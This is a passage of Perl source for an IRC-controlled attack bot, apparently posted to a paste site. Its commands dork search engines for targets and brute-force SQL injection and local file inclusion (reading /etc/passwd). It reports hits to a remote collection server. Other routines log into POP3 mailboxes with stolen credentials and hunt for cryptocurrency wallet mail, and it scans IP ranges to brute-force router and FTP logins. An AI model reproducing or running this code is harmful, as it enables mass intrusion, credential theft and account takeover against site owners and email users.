- else{ send_msg($channel,"[RFI] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
- (@rfi_urls,@rfi_sites) = ();
- exit;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!lfi") && ($irc_parsed1[5])){
- my($dork,$com,$net,$org);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- my $sc1 = fork;
- if($sc1){ waitpid($sc1,0); } elsif($sc1 == 0){ my $sc2 = fork;
- if($sc2){ send_msg($irc_parsed1[0],"[LFI] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
- elsif($sc2==0){
- $com = $dork."+site:com"; $net = $dork."+site:net"; $org = $dork."+site:org";
- send_msg($channel,"[LFI] [Onet] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
- send_msg($channel,"[LFI] [Onet] Dork: \"$net\" - Results: " . &rfi_onet($net,"0")); $uc=0;
- send_msg($channel,"[LFI] [Onet] Dork: \"$com\" - Results: " . &rfi_onet($com,"0")); $uc=0;
- send_msg($channel,"[LFI] [Onet] Dork: \"$org\" - Results: " . &rfi_onet($org,"0")); $uc=0;
- if($#rfi_urls){ #send_msg($channel,"[RFI] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
- &url_validate("LFI","",@rfi_urls); send_msg($channel,"[LFI] Dork: \"$dork\" - Finished");
- } else{ send_msg($channel,"[LFI] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
- (@rfi_urls,@rfi_sites) = ();
- exit;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!sql") && ($irc_parsed1[5])){
- my($dork,$com,$net,$org);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
- elsif($sc1 == 0){ my $sc2 = fork;
- if($sc2){ send_msg($irc_parsed1[0],"[SQL] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
- elsif($sc2==0){
- $com = $dork."+site:com"; $net = $dork."+site:net"; $org = $dork."+site:org";
- &rfi_onet($dork,"0"); $uc=0;
- &rfi_onet($net,"0"); $uc=0;
- &rfi_onet($com,"0"); $uc=0;
- &rfi_onet($org,"0"); $uc=0;
- if($#rfi_urls){ #send_msg($channel,"[SQL] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
- &url_validate("SQL","",@rfi_urls); #send_msg($channel,"[SQL] Dork: \"$dork\" - Finished");
- } else { send_msg($channel,"[SQL] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
- (@rfi_urls,@rfi_sites) = ();
- exit;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!dork") && ($irc_parsed1[6])){
- my($dork,$vPage); $vPage = $irc_parsed1[5];
- for(6..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
- elsif($sc1 == 0){ my $sc2 = fork;
- if($sc2){ send_msg($irc_parsed1[0],"[DORK] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
- elsif($sc2==0){
- send_msg($channel,"[DORK] Dork: \"$dork\" Starting");
- send_msg($channel,"[DORK] [ALLTHEWEB] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
- if($#rfi_urls){ #send_msg($channel,"[DORK] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
- &url_validate("DORK",$vPage,@rfi_urls); send_msg($channel,"[DORK] Dork: \"$dork\" - Finished");
- } else{ send_msg($channel,"[DORK] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
- (@rfi_urls,@rfi_sites) = ();
- exit;
- }
- exit;
- }
- }
- elsif(($irc_parsed1[3] eq ":!google") && ($irc_parsed1[5])){
- my($dork);
- for(5..$#irc_parsed1){$dork .= $irc_parsed1[$_] . " ";}
- $dork = substr($dork,0,length($dork)-1);
- my $sc1 = fork; if($sc1){ waitpid($sc1,0); }
- elsif($sc1 == 0){ my $sc2 = fork;
- if($sc2){ send_msg($irc_parsed1[0],"[GOO] Dork: \"$dork\" - Stop with !kill $nick $sc2"); exit; }
- elsif($sc2==0){
- send_msg($channel,"[GOO] Dork: \"$dork\" Starting");
- send_msg($channel,"[GOO] [GOOGLE] Dork: \"$dork\" - Results: " . &rfi_onet($dork,"0")); $uc=0;
- if($#rfi_urls){ #send_msg($channel,"[GOO] Dork: \"$dork\" - Validating " . ($#rfi_urls+1) . " URL's");
- &url_validate("RFI","",@rfi_urls); send_msg($channel,"[GOO] Dork: \"$dork\" - Finished");
- } else { send_msg($channel,"[GOO] [MULTISCAN] Dork: \"$dork\" Finished {NO URLS FOUND}"); }
- (@rfi_urls,@rfi_sites) = ();
- exit;
- }
- exit;
- }
- }
- ########}
- }
- }
- }
- sub sqlbrute() {
- my $To=$channel;
- my $site=$_[0];
- my $columns=$_[1];
- my $cfin.="--";
- my $cmn.= "+";
- for($column=0;$column<$columns;$column++) {
- $union.=','.$column; $inyection.=','."0x566f6f5f446f6f";
- if ($column == 0) { $inyection = ''; $union = ''; }
- $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x566f6f5f446f6f".$inyection.$cfin; print($sql."\n");
- $response=&getreq($sql) or print("[SQL]"," Failed to try to find the number of columns, check website\n");
- if($response =~ /Voo_Doo/) {
- $column ++;
- $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
- send_msg($channel,"[Sql-Brute] $sql"); &dodaj('sqltable', $sql);
- foreach $tabla(@tabele)
- {
- chomp($tabla);
- $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x566f6f5f446f6f".$inyection.$cmn."from".$cmn.$tabla.$cfin;
- $response=&getreq($sql) or die("[-] Impossible to get tables\n");
- if($response =~ /Voo_Doo/) {
- print "\n[+] Table $tabla exists...saving in $ARGV[2]";
- $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
- send_msg($channel,"[Sql-Brute] $sql"); &dodaj('sqlcccc', $sql);
- }
- }
- }
- }
- }
- sub lfibrute() {
- my $link = $_[0]."./../../../../../../../../../etc/passwd"; $response=&getreq($link);
- if ($response =~ /$lfi_text/) { send_msg($channel,"[LFI] $link"); &dodaj('lfi', $link); }
- my $link2 = $_[0]."./../../../../../../../../../etc/passwd%00"; print($link2."\n"); $response2=&getreq($link2);
- if ($response2 =~ /$lfi_text/) { send_msg($channel,"[LFI] $link2"); &dodaj('lfi', $link2); }
- }
- use MIME::Base64;
- sub dodaj() {
- my $co = $_[0]; my $link = $_[1]; my $linkraz = $_[2];
- my $links = encode_base64($link); my $lindwa = encode_base64($linkraz);
- $links=~s/\n//; $links=~s/\r//;$lindwa=~s/\n//; $lindwa=~s/\r//;
- if($co eq "sqlczyste") { my $safet = $savev.'?co=sqlczyste&link='.$links; &getreq($safet); }
- elsif ($co eq "sqltable") { my $safet = $savev.'?co=sqltable&link='.$links; &getreq($safet); }
- elsif ($co eq "sqldone") { my $safet = $savev."?co=sqldone&link=".$links; &getreq($safet); }
- elsif ($co eq "sqlcccc") { my $safet = $savev."?co=sqlcccc&link=".$links; &getreq($safet); }
- #--------------------------------------------------------- _SQL
- elsif ($co eq "lfi") { my $safet = $savev."?co=lfi&vuln=".$links; &getreq($safet); }
- elsif ($co eq "lfi2rce") { my $safet = $savev.'?co=lfi2rce&link='.$links; &getreq($safet); }
- elsif ($co eq "lficonf") { my $safet = $savev.'?co=lficonf&link='.$links; &getreq($safet); }
- #--------------------------------------------------------- _LFI
- }
- sub pop3() {
- my $dork = $_[0]; print($dork."\n");
- my ($user,$password)=split(/:/,$dork);
- my ($lol,$host) = split(/@/,$user);
- #&send_msg($channel,"Dork: $dork USer: $user Pass: $password Dom $host Lol: $lol ");
- if($sockz = new IO::Socket::INET(PeerAddr => $host,PeerPort => 110,Proto => 'tcp',Timeout=>'1')) {
- $n = sysread($sockz, $buffer, 4096);
- if (substr($buffer, 0, 3) ne "+OK") { print "Problem with pop server\n"; exit(0); } else { print "$buffer"."Opening message successfully read\n"; }
- $buffer = "USER $user\r\n";
- syswrite($sockz, $buffer, length($buffer));
- $n = sysread($sockz, $buffer, 4096);
- if (substr($buffer, 0, 3) ne "+OK") { print "Username incorrect\n"; exit(0); } else { print "USER command successfully sent\n$buffer"; }
- $buffer = "PASS $password\r\n";
- syswrite($sockz, $buffer, length($buffer));
- $n = sysread($sockz, $buffer, 4096);
- if (substr($buffer, 0, 3) ne "+OK") { print "Password incorrect\n"; exit(0); } else { print "PASS command successfully sent\n$buffer"; }
- $buffer = "STAT\r\n";
- syswrite($sockz, $buffer, length($buffer));
- $n = sysread($sockz, $buffer, 4096);
- chop $buffer; chop $buffer;
- ($OK, $messages, $octets) = split(/ /, $buffer, 3);
- if ($OK ne "+OK") { print "STAT command error\n"; exit(0); } else { print "STAT command successfully sent\n$buffer\n"; }
- $mess = "message"; if ($messages != 1) { $mess.= "s"; } $octmess = "octet"; if ($octets != 1) { $octmess.= "s"; }
- print "POP server \"$host\" has $messages $mess "; print "for \"$user\" ($octets $octmess)\n";
- &send_msg($channel," $user:$password Email: has $messages $mess Server pop3: $host "); sleep(2);
- &nag($user,$password,$host);
- $buffer = "QUIT\r\n";
- syswrite($sockz, $buffer, length($buffer));
- $n = sysread($sockz, $buffer, 4096);
- if (substr($buffer, 0, 3) ne "+OK") { print "QUIT command error\n"; exit(0); } else { print "QUIT command successfully sent\n $buffer"; }
- close ($sockz);
- } exit(0);
- }
- sub nag() {
- my $riri; my $lu; my $i;
- my $username = $_[0]; my $password = $_[1]; my $domena = $_[2]; print($username,$password,$domena."zzzzzzzzzzzzzzzzzzzzzzzzzz\n");
- $riri = new Mail::POP3Client( USER => $username, PASSWORD => $password, HOST => $domena );
- for ($i = 1; $i <= $riri->Count(); $i++) {
- foreach ( $riri->Head( $i ) ) { /^(From|Subject):\s+/i and $lu = $_;
- # foreach ( $riri->Head( $i ) ) { /^(From):\s+/i and $lu = $_;
- print($lu."\n");
- #--------------------------- $$$
- if($lu =~ /zxc/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/blockchain"); }
- elsif($lu =~ /4coins/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/4coins"); }
- elsif($lu =~ /bitmarket/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitmarket"); }
- elsif($lu =~ /dgtmarket/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/dgtmarket"); }
- elsif($lu =~ /bitbay/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitbay"); }
- elsif($lu =~ /BitBay/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:hajs/bitbay"); }
- elsif($lu =~ /wallet/){ &send_msg($channel,"Email search engone Login: $username Passwd: $password Found Word:wallet"); }
- }
- } }
- sub router_ftp() {
- my ($host) = shift;
- my ($zuser,$zpass);
- my $ftp = Net::FTP->new($host,Timeout=>'1') or return;
- # grab banner
- my $banner = $ftp->message;
- $banner =~ s/\n/ /g;
- &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");
- foreach my $cred(@http_AU_Voo) {
- my ($zuser,$zpass)=split(/:/,$cred);
- #print($zuser, $zpass."\n");
- #
- if($ftp->login($zuser, $zpass)) {
- &send_msg($channel,'crac FTP: ftp://'.$zuser.':'.$zpass.'\@$host ');
- &send_msg($channel,"ftp://$zuser:$zpass\@$host");
- # print($user, $pass."\n");
- $ftp->quit;
- #$zpm->finish;
- return;
- } else {
- next;
- # return;
- # Anonymous checker
- if ($ftp->login('anonymous', 'no@gov.com')) {
- &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");
- } else {
- &send_msg($channel,"Anonymous FTP: ftp://$host/ Banner: $banner");
- return;
- } # end anonymous
- } }
- } # end brute force
- sub router_attack()
- {
- my $target=shift;
- if ($sox = IO::Socket::INET->new(PeerAddr=>$target,PeerPort=>80,Proto=>'tcp',Timeout=>'1'))
- { print($target." OPEN\n");
- my $cos = "http://".$target."/";
- my $strona = &getreq($cos);
- if($strona =~ /<title>(.*)<\/title>/i)
- {
- sleep(2); #send_msg($channel,"[Open] http://".$target."/ => $1");
- # print $pwnage_ban "$1 => $cos \n";
- }
- if($strona=~/401|unauthorized|Authentication|Protected Object|Protected/i)
- {
- # &msg('[DEBUG] => Odkrylem 401 ... napierdalaaamy $target !');
- &passwd($target);
- }
- else
- {
- # &msg('[DEBUG]','Kurwa, cos nie tak z soketem, moj Wladco Karaluchow ;D');
- }
- close $sox;
- }
- }
- sub passwdftp() {
- my $ss; my $host = $_[0];
- my $ftp = Net::FTP->new($host,Timeout=>'3') or return;
- }
- sub passwd()
- {
- my $ip = "http://".$_[0]."/";
- foreach my $cred(@http_AU_Voo)
- {
- my $ua = LWP::UserAgent->new;
- my $req = HTTP::Request->new(GET => $ip);
- my ($user,$pass)=split(/:/,$cred);
- $req->authorization_basic($user,$pass);
- my $te = $ua->request($req)->as_string;
- if($te =~ /HTTP\/1.1 200 OK/)
- { if($pass =~ /to_JEST_FEJK/) { exit; }
- #print("$ip $user $pass");
- &send_msg($channel,"V_Cracked > ".$ip." Login $user Password $pass");
- # TUTAJ SUB DODAJ BEDZIE
- # print $pwnage_has "$ip:$user:$pass \n";
- my $jedne = $ip;
- my $dwa = $user.":".$pass;
- #spread::dodaj('router',$jedne,$dwa);
- return;
- }
- }
- }
- #UKRUCIIC TE GOWNO DOWN
- sub main {
- my($ipa, $ipb, $ipc, $ipd) = ($_[0] =~ m/^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/) or die("Append start IP.\n");
- my $dwa=$_[1];
- print "Start scanning...\nBe patient.\n";
- my $OUTPUT_AUTOFLUSH = 1; # To avoid buffering problems with fork()
- # loop through IPs
- while (1) {
- for my $a ($ipa..255) {
- if ($a == 10 || $a == 198 || $a == 127 || $a == 0 || $a == 172 || $a == 1) { next; }
- for my $b ($ipb..255) {
- for my $c ($ipc..255) {
- for my $d ($ipd..255) {
- if (fork() == 0) {
- #print "$a.$b.$c.$d\n"; # Uncomment for verbose output
- if($dwa eq "rou") { &router_attack("$a.$b.$c.$d"); }
- if($dwa eq "ftp") { &router_ftp("$a.$b.$c.$d"); }
- exit;
- } else {
- $childs++;
- if ($childs >= $config{'max_childs'}) { wait(); $childs--; }
- }
- } # end $d
- } # end $c
- } # end $b
- } #end $a
- } # end while
- } #end main()
- use LWP::Simple;
- ###------------ Pobierz
- sub getstore ($$)
- {
- my $url = shift;
- my $file = shift;
- system("wget ".$url." -O ".$file);
- $http_stream_out = 1;
- open(GET_OUTFILE, "> $file");
- %http_loop_check = ();
- _get($url);
- close GET_OUTFILE;
- return $main::http_get_result;
- }
- sub _get
- {
- my $url = shift;
- my $proxy = "";
- grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
- if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
- my $host = $1;
- my $port = $2 || 80;
- my $path = $3;
- $path = "/" unless defined($path);
- return _trivial_http_get($host, $port, $path);
- } elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
- my $host = $1;
- my $port = $2;
- my $path = $url;
- return _trivial_http_get($host, $port, $path);
- } else {
- return undef;
- }
- }
- sub _trivial_http_get
- {
- my($host, $port, $path) = @_;
- my($AGENT, $VERSION, $p);
- $AGENT = "get-minimal";
- $VERSION = "20000118";
- $path =~ s/ /%20/g;
- require IO::Socket;
- local($^W) = 0;
- my $sock = IO::Socket::INET->new(PeerAddr => $host,
- PeerPort => $port,
- Proto => 'tcp',
- Timeout => 60) || return;
- $sock->autoflush;
- my $netloc = $host;
- $netloc .= ":$port" if $port != 80;
- my $request = "GET $path HTTP/1.0\015\012"
- . "Host: $netloc\015\012"
- . "User-Agent: $AGENT/$VERSION/u\015\012";
- $request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
- $request .= "\015\012";
- print $sock $request;
- my $buf = "";
- my $n;
- my $b1 = "";
- while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
- if ($b1 eq "") {
- $b1 = $buf;
- $buf =~ s/.+?\015?\012\015?\012//s;
- }
- if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
- }
- return undef unless defined($n);
- $main::http_get_result = 200;
- if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
- $main::http_get_result = $1;
- if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
- my $url = $1;
- return undef if $http_loop_check{$url}++;
- return _get($url);
- }
- return undef unless $main::http_get_result =~ /^2/;
- }
- return $buf;
- }
Add Comment
Please, Sign In to add comment